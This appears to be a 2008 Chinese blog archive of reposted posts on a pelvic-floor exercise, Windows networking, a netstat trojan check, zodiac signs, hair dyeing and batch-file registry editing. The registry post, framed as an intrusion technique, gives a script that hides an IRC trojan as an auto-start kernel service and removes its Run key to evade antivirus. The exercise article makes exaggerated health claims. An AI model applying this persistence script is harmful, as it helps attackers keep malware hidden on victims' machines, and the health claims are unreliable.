2008年3月份日本「健康」雜誌刊載
作者:內田輝和 內田針灸治療院院長
全日本針灸學會 理事
為腰痛、尿失禁所困擾,想盡辦法也治不好,整天為隨著年歲增長而不斷增加的各種病痛而煩惱不已的人,如果聽到一種隻要簡單的姿勢就可以解決這些問題的體操,妳難道不會躍躍欲試嗎?
這種神奇的體操,我想把它取名為「讓妳年輕15歲的單一姿勢的體操」,其實,這種體操的名字應該叫做「肛門收縮術」,方法很簡單,請妳按照附圖把身體姿勢站好,然後快速的收縮肛門就行了。
至於「肛門收縮術」為什麼能讓我們身體健康,請容我慢慢道來!
我們人體臀部的肌肉,由大臀肌、中臀肌和大腿二頭肌這三種肌肉構成,這些肌肉不隻是造成臀部的形狀,而且有安定並保護骨盤的作用,而骨盤的功用是要來支撐內臟,附在骨盤上面的「骨盤底肌」這種肌肉,更是能直接支撐骨盤內的內臟。
如果這些肌肉衰弱了,失去支撐的骨盤就會歪斜,內臟的運動和血液循環就會遲鈍,如果情形進一步惡化,就會形成腰痛、坐骨神經痛、肩膀僵硬、O型腳、下半身肥胖、髖骨關節痛、尿失禁等各種症狀。
練習「肛門收縮術」,可以強化肛門周圍的肌肉,就可以大大的預防並改善臀部周圍的不適的症狀。
更神奇的是,到我的診所來看病的患者,經過我的指導而練習「肛門收縮術」之後,不但臀部不再下垂,而且皮膚變漂亮,行動敏捷,整個人顯得年輕許多,達到女性夢寐以求的美容效果!
這種體操之所以有美容效果,是因為鍛鍊臀部的肌肉而改善了血液循環,血液中的氧氣就可以到達全身每一個部位,純淨的血液可以美化肌膚,並使血管再度年輕起來!
還有,鍛鍊臀部周圍的肌肉可以使內臟回到正常的位置,整個身體都獲得矯正,下垂的乳房恢復堅挺,腰圍也會縮小,自然就能擺出精神奕奕的姿勢,整個人也會顯得年輕了一二十歲!
一個人變漂亮了,就會希望讓更多人看到,自然就會更想打扮和化妝,這樣就會形成「美的良性循環」,而讓妳越來越漂亮!
各位小姐,妳難道不想練習「肛門收縮術」,讓妳的身體內部和外部都同時變得漂亮嗎?
功效:治療腰痛、肩膀酸痛、尿失禁
改善頭痛、坐骨神經痛
減肥、縮小臀圍和腰圍
提升骨質密度
改善新陳代謝症候群
方法:腳後跟併攏
頭部與腳跟成一直線
雙手手心向外
兩肩向後縮,使背部形成皺紋
急速並用力收縮肛門,並保持收縮狀態10秒鐘
每天做五次,任何時間皆可,有空儘可多做
問題與回答:
問:有不適合做這種體操的人嗎?
答:原則上沒有不適合做這種體操的人,但是,如果因為感冒而發燒,或是身體受傷而有流血或疼痛,則最好不要勉強,另外,這種體操雖然對腰痛和坐骨神經痛有幫助,但是如果腰痛和坐骨神經痛的症狀很嚴重,勉強做這種體操反而會使症狀惡化,在這種情形下,也請暫時不要做這種體操。
問:在什麼時間做這種體操比較適當呢?
答:到目前為止,已經有很多人練習過這種體操,我還沒有發現由於練習的時間不同而效果有所不同,因此,你儘管在你喜歡的時間來練習好了,不過,洗澡的時候,血液容易上沖頭部,最好不要一邊洗澡,一邊體操。
問:一天可以做三次以上嗎?
答:可以的,基本上這隻是一個簡單的體操,多做幾次也不會產生副作用,做了「肛門收縮術」而感覺有效的人,可以隨時想到就多做幾回試試看,不過,如果姿勢不正確,可能引起腰痛,而且無法顯現效果,所以,最好照照鏡子,好好的檢查自己的姿勢是否正確。
問:我已經70歲了,練習「肛門收縮術」還會有效果嗎?
答:一定有效果,下面有幾篇練習這種體操的經驗談,那些練習之後,治好了腰痛、臀部下垂的毛病的 女士當中,就有一位已經78歲了,不管妳幾歲,隻要持續不斷的練習這種體操,不但能使身體健康,而且能使妳的身材變苗條,所以,我希望妳們都來練練看!
星期五, 8月 22, 2008
星期四, 8月 21, 2008
Windows 98 Join Domain
Adding Win 98 Clients to the domain
Win 98 clients need ‘Microsoft client for networks’ installing to join/logon to a domain
To see if you have it installed
Start> Settings >Control Panel
Double click ‘Network’
You should now see your network adaptor (NIC or modem)
If ‘Client for Microsoft Networks’ is not listed add it as follows
Click Add
Select Client and click Add
Select Microsoft (on the left)
Select ‘Client for Microsoft Networks (on the right)
You may be asked to insert the Windows 98 CD, do so.
Ensure the Primary network logon is set to ‘client for Microsoft networks’
Than double click ‘‘client for Microsoft networks’ in the list above.
In the Logon Validation section tick ‘Logon to Windows NT Domain’
Type the domain name in the Box (don’t need the extension i.e. mysite.co.uk would be MYSITE)
In the Network logon options section ensure ‘logon and restore network connections’ is ticked.
Click OK and ensure ‘Client for Microsoft Networks’ is still the primary network logon.
Double click TCP/IP and ensure you have a valid IP address or its set to ‘Obtain an IP address automatically’
If you have a WINS server enter its details on the WINS tab (Make sure you click add)
If you have a Default Gateway enter its details on the Gateway tab (Make sure you click add)
Click the DNS tab, (THIS is where most mistakes occur!!) Tick ‘Enable DNS’
In the host box type ‘YOURCOMPUTERNAME’
In the Domain box put the domain name (i.e. oursite.org.uk)
If you have a lot of domain namespaces (i.e. north.oursite.org.uk south.oursite.org.uk etc) you can put them in the search order (Main site at the TOP!)
Click OK
Now you need to set up the Network Identification
Start> Settings >Control Panel
Double click ‘Network’
Select the Identification tab
Enter or check the ‘computer name’ is THE SAME as the one on the DNS ‘host’ above
In the workgroup box type the domain name in the Box (don’t need the extension i.e. mysite.co.uk would be MYSITE)
Computer description (i.e. my desktop PC)
Reboot the machine! ! !
You should now be able to logon to the domain
Win 98 clients need ‘Microsoft client for networks’ installing to join/logon to a domain
To see if you have it installed
Start> Settings >Control Panel
Double click ‘Network’
You should now see your network adaptor (NIC or modem)
If ‘Client for Microsoft Networks’ is not listed add it as follows
Click Add
Select Client and click Add
Select Microsoft (on the left)
Select ‘Client for Microsoft Networks (on the right)
You may be asked to insert the Windows 98 CD, do so.
Ensure the Primary network logon is set to ‘client for Microsoft networks’
Than double click ‘‘client for Microsoft networks’ in the list above.
In the Logon Validation section tick ‘Logon to Windows NT Domain’
Type the domain name in the Box (don’t need the extension i.e. mysite.co.uk would be MYSITE)
In the Network logon options section ensure ‘logon and restore network connections’ is ticked.
Click OK and ensure ‘Client for Microsoft Networks’ is still the primary network logon.
Double click TCP/IP and ensure you have a valid IP address or its set to ‘Obtain an IP address automatically’
If you have a WINS server enter its details on the WINS tab (Make sure you click add)
If you have a Default Gateway enter its details on the Gateway tab (Make sure you click add)
Click the DNS tab, (THIS is where most mistakes occur!!) Tick ‘Enable DNS’
In the host box type ‘YOURCOMPUTERNAME’
In the Domain box put the domain name (i.e. oursite.org.uk)
If you have a lot of domain namespaces (i.e. north.oursite.org.uk south.oursite.org.uk etc) you can put them in the search order (Main site at the TOP!)
Click OK
Now you need to set up the Network Identification
Start> Settings >Control Panel
Double click ‘Network’
Select the Identification tab
Enter or check the ‘computer name’ is THE SAME as the one on the DNS ‘host’ above
In the workgroup box type the domain name in the Box (don’t need the extension i.e. mysite.co.uk would be MYSITE)
Computer description (i.e. my desktop PC)
Reboot the machine! ! !
You should now be able to logon to the domain
星期三, 8月 20, 2008
你部腦有無被偷看,一CHECK就知
Windows XP 在〔開始〕->〔執行〕,輸入〔cmd〕確定,在〔 command prompt〕 鍵入〔netstat〕查看目前已與本電腦建立的連接。
顯示出來的結果表示為四列,其意思分別為Proto:協議,Local Address:本地地址,Foreign Address:遠程地址,State:狀態。在位址欄中冒號的後面就是埠號。如果發現埠號碼異常(比如大於5000),而Foreign Address中的位址又不為正常網路流覽的位址,那麼可以判斷你的機器正被Foreign Address中表示的遠端電腦所窺視著。
在對應行的Foreign Address中顯示的IP位址就是目前非法連接你電腦的木馬用戶端。 當網路處於非活動狀態,也就是目前沒什麼活動網路連接時,在 command prompt 視窗中用netstat命令將看不到什麼東西。此時可以使用「netstat -a」,加了常數「-a」表示顯示電腦中目前處於監聽狀態的埠。
對於Windows98來說,正常情況下,會出現如下的一些處於監聽狀態的埠(安裝有NETBEUI協議): 如果出現有不明埠處於監聽(LISTENING)狀態,而目前又沒有進行任何網路服務操作,那麼在監聽該埠的就是特洛伊木馬了! 注意,使用此方法查詢處於監聽狀態的埠,一定要保證在短時間內(最好5分鐘以上)沒有運行任何網路衝浪軟體,也沒有進行過任何網路操作,比如流覽網頁,收、發信等。不然容易混淆對結果的判斷。
顯示出來的結果表示為四列,其意思分別為Proto:協議,Local Address:本地地址,Foreign Address:遠程地址,State:狀態。在位址欄中冒號的後面就是埠號。如果發現埠號碼異常(比如大於5000),而Foreign Address中的位址又不為正常網路流覽的位址,那麼可以判斷你的機器正被Foreign Address中表示的遠端電腦所窺視著。
在對應行的Foreign Address中顯示的IP位址就是目前非法連接你電腦的木馬用戶端。 當網路處於非活動狀態,也就是目前沒什麼活動網路連接時,在 command prompt 視窗中用netstat命令將看不到什麼東西。此時可以使用「netstat -a」,加了常數「-a」表示顯示電腦中目前處於監聽狀態的埠。
對於Windows98來說,正常情況下,會出現如下的一些處於監聽狀態的埠(安裝有NETBEUI協議): 如果出現有不明埠處於監聽(LISTENING)狀態,而目前又沒有進行任何網路服務操作,那麼在監聽該埠的就是特洛伊木馬了! 注意,使用此方法查詢處於監聽狀態的埠,一定要保證在短時間內(最好5分鐘以上)沒有運行任何網路衝浪軟體,也沒有進行過任何網路操作,比如流覽網頁,收、發信等。不然容易混淆對結果的判斷。
星期二, 8月 19, 2008
如何更正websams upgrade 後的亂碼
1.
login SAMS SERVER(出現亂碼那部機)
先close WEBSAMS 記住3 - 2 - 1!!!!!!!
control panel-->Reginal Option
General ---> you locate
選English(任何一個國家都得)
Press "Apply"
再選
Chinese(HK)
Press "Apply"
入碟, then reboot
再START WEBSAMS
=========================
2.請到 d:\WebSAMS\batch\utilities\ 將 mingliu.ttc 檔抄到 Windows 的 fonts 資料匣內。
login SAMS SERVER(出現亂碼那部機)
先close WEBSAMS 記住3 - 2 - 1!!!!!!!
control panel-->Reginal Option
General ---> you locate
選English(任何一個國家都得)
Press "Apply"
再選
Chinese(HK)
Press "Apply"
入碟, then reboot
再START WEBSAMS
=========================
2.請到 d:\WebSAMS\batch\utilities\ 將 mingliu.ttc 檔抄到 Windows 的 fonts 資料匣內。
星期一, 8月 18, 2008
十二星座的自我價值
牡羊:
不可諱言的這個星座就是隻愛自己的星座,其實你的自我價值觀很正確但問題救出在太自我沒有把別人的需要放在眼裡,這一點要注意喔!
金牛:
你的自我價值就是能夠帶給自己和別人安全感,你的溫柔與體貼雖然平實不表現出來,但是如果你能發現這個特點帶給需要的人一些安全感你會很有成就呢!
雙子:
你覺得最讓自己有價值的就是你的溝通技巧,你來回穿梭於同學之間,扮演著中間人的角色讓你體驗到自己在社團或班上扮演重要的角色呢!
巨蟹:
巨蟹座常常需要很多很多的安全感,然而你常常忘記你照顧別人的時候都會散發出一種母性的關懷,這其實就是你生命當中最有價值的地方喔!
獅子:
我知道很多人都說你臭屁,但是有目標有自信就是一個獅子座最有價值之處,如果你能夠展現出你的活力、快樂、帶給大家快樂時你就成為自己的無價之寶啦!
處女:
很多處女座都低估了自己值得被人喜愛的價值,你的細心體貼與實際往往需要跟你親近的人才能夠瞭解,所以也不必因為不瞭解你的人而自暴自棄不是嗎?
天秤:
天秤座是天生的和平大使,你們總是有辦法讓大家處的很平穩而且顧及到每一個人,然而有些時候會讓你們失去自我喔!要小心,這會讓你的魅力減少很多的!
天蠍:
你擁有神秘的魅力,不過往往不喜歡表現或是自己找不到,這需要多方常識,多補充自己如何裝扮,多點微笑你會發現自己舉手投足都會很性感喔!
射手:
你的自我價值就在於那種無藥可救的樂觀態度,以及永遠向前看的積極面,反正不用我說你也不會在意別人怎麼看你,所以盡情的展現自我吧!
摩羯:
太陽或金星在摩羯座的人常對情感還有自己的魅力沒自信,事實上隨著年齡的成長以及社會經驗的豐富,摩羯座會變得超有魅力的,所以寧缺勿濫這時候沒人欣賞我們要先學會欣賞自己的成熟。
水瓶:
你的特殊還有與眾不同就是你自身最有價值的地方,或許有些人會說你怪,但是喜歡你的人照樣會對你崇拜的要死。
雙魚:
你的自我價值就是心地善良,有些時候雖然天真的可愛,但是你的善良會打動許多人的心喔!但是還是要建議你有些時候不要太愛幻想,特別是那種為愛犧牲的事情,對你來說還太早。
不可諱言的這個星座就是隻愛自己的星座,其實你的自我價值觀很正確但問題救出在太自我沒有把別人的需要放在眼裡,這一點要注意喔!
金牛:
你的自我價值就是能夠帶給自己和別人安全感,你的溫柔與體貼雖然平實不表現出來,但是如果你能發現這個特點帶給需要的人一些安全感你會很有成就呢!
雙子:
你覺得最讓自己有價值的就是你的溝通技巧,你來回穿梭於同學之間,扮演著中間人的角色讓你體驗到自己在社團或班上扮演重要的角色呢!
巨蟹:
巨蟹座常常需要很多很多的安全感,然而你常常忘記你照顧別人的時候都會散發出一種母性的關懷,這其實就是你生命當中最有價值的地方喔!
獅子:
我知道很多人都說你臭屁,但是有目標有自信就是一個獅子座最有價值之處,如果你能夠展現出你的活力、快樂、帶給大家快樂時你就成為自己的無價之寶啦!
處女:
很多處女座都低估了自己值得被人喜愛的價值,你的細心體貼與實際往往需要跟你親近的人才能夠瞭解,所以也不必因為不瞭解你的人而自暴自棄不是嗎?
天秤:
天秤座是天生的和平大使,你們總是有辦法讓大家處的很平穩而且顧及到每一個人,然而有些時候會讓你們失去自我喔!要小心,這會讓你的魅力減少很多的!
天蠍:
你擁有神秘的魅力,不過往往不喜歡表現或是自己找不到,這需要多方常識,多補充自己如何裝扮,多點微笑你會發現自己舉手投足都會很性感喔!
射手:
你的自我價值就在於那種無藥可救的樂觀態度,以及永遠向前看的積極面,反正不用我說你也不會在意別人怎麼看你,所以盡情的展現自我吧!
摩羯:
太陽或金星在摩羯座的人常對情感還有自己的魅力沒自信,事實上隨著年齡的成長以及社會經驗的豐富,摩羯座會變得超有魅力的,所以寧缺勿濫這時候沒人欣賞我們要先學會欣賞自己的成熟。
水瓶:
你的特殊還有與眾不同就是你自身最有價值的地方,或許有些人會說你怪,但是喜歡你的人照樣會對你崇拜的要死。
雙魚:
你的自我價值就是心地善良,有些時候雖然天真的可愛,但是你的善良會打動許多人的心喔!但是還是要建議你有些時候不要太愛幻想,特別是那種為愛犧牲的事情,對你來說還太早。
星期日, 8月 17, 2008
如何用批处理文件来操作注册表
在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"Door"=C://WINNT//system32//door.exe
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
执行该脚本,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C://WINNT//system32//door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:/winnt/system32/windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.
关于注册表的操作,常见的是创建、修改、删除。
1.创建
创建分为两种,一种是创建子项(Subkey)
我们创建一个文件,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/hacker]
然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft下创建了一个名字为“hacker”的子项。
另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"Door"=C://WINNT//system32//door.exe
"Autodos"=dword:02
这样就在[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”
2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。
3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Ex4rch"=-
执行该脚本,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]下的"Ex4rch"就被删除了;
我们再看看删除一个子项,我们创建一个如下的脚本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
执行该脚本,[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]就已经被删除了。
相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C://WINNT//system32//door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:/winnt/system32/windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]
@REM 这样不是更安全^_^.
星期六, 8月 16, 2008
健康又美丽正确染发方法
在计划染发之前一个礼拜,应该进行1~2次的护发;在染发之前,请专业染发师检测发质及头皮状况,来挑选适合的染发药水。
每次的染发和上一次的染发,最好间隔两个半月以上,而且记得要交互使用永久染(补染新长出的头发或原本未处理到的头发部分)与护发染(上次染过却已微微掉色的头发),这样一来就能降低发质严重受损的机率。
至于第一次染发的美眉呢,最好先采用挑染,之后再视情况决定是否整头都染,以免头发受到过度伤害,染过后的头发才会健康又漂亮。
★染后护彩新秘诀
也许你一直期待用变幻多端的色彩,为头发增添一抹彩虹般的眩亮时尚,但你是否总暗暗担心:染发虽然为发丝带来了颜色,却夺走了健康的美丽光彩?秀发如何才能持久散发出彩色水晶般的染后光泽?染发伤害不同于普通的物理伤害,它是内部伤害,只有专门针对染后受损发质的洗发露和润发精华素,才能给秀发深层的修复。
★染发Tips:
1、染发当天不要洗头,头皮分泌的油分,恰恰是头发天然的保护膜。
2、使用专业的洗护产品,比如潘婷莹彩深层秀护系列。
3、头发颜色的选择要和眼睛与眉毛的色彩相配合,假如眉毛太浓发色太浅,会变成非常恐怖的“眉毛怪人”。
4、各种颜色的色素颗粒直径不一,蓝色最大,紫色、绿色、红(橙)色、黄色依次减小。所以蓝紫色最不容易染上,染上后也最易发生色素流失,需要加倍小心护理。
5、为了给受损发质充分时间以休养,全头染发两周后才可烫发,六到八周后才可再次染发。
6、染后头发的清洗,要格外重视护发素的使用;要每次使用洗发露的同时配合使用润发精华素,护发素的用量应该是洗发香波的两倍。
每次的染发和上一次的染发,最好间隔两个半月以上,而且记得要交互使用永久染(补染新长出的头发或原本未处理到的头发部分)与护发染(上次染过却已微微掉色的头发),这样一来就能降低发质严重受损的机率。
至于第一次染发的美眉呢,最好先采用挑染,之后再视情况决定是否整头都染,以免头发受到过度伤害,染过后的头发才会健康又漂亮。
★染后护彩新秘诀
也许你一直期待用变幻多端的色彩,为头发增添一抹彩虹般的眩亮时尚,但你是否总暗暗担心:染发虽然为发丝带来了颜色,却夺走了健康的美丽光彩?秀发如何才能持久散发出彩色水晶般的染后光泽?染发伤害不同于普通的物理伤害,它是内部伤害,只有专门针对染后受损发质的洗发露和润发精华素,才能给秀发深层的修复。
★染发Tips:
1、染发当天不要洗头,头皮分泌的油分,恰恰是头发天然的保护膜。
2、使用专业的洗护产品,比如潘婷莹彩深层秀护系列。
3、头发颜色的选择要和眼睛与眉毛的色彩相配合,假如眉毛太浓发色太浅,会变成非常恐怖的“眉毛怪人”。
4、各种颜色的色素颗粒直径不一,蓝色最大,紫色、绿色、红(橙)色、黄色依次减小。所以蓝紫色最不容易染上,染上后也最易发生色素流失,需要加倍小心护理。
5、为了给受损发质充分时间以休养,全头染发两周后才可烫发,六到八周后才可再次染发。
6、染后头发的清洗,要格外重视护发素的使用;要每次使用洗发露的同时配合使用润发精华素,护发素的用量应该是洗发香波的两倍。
訂閱:
文章 (Atom)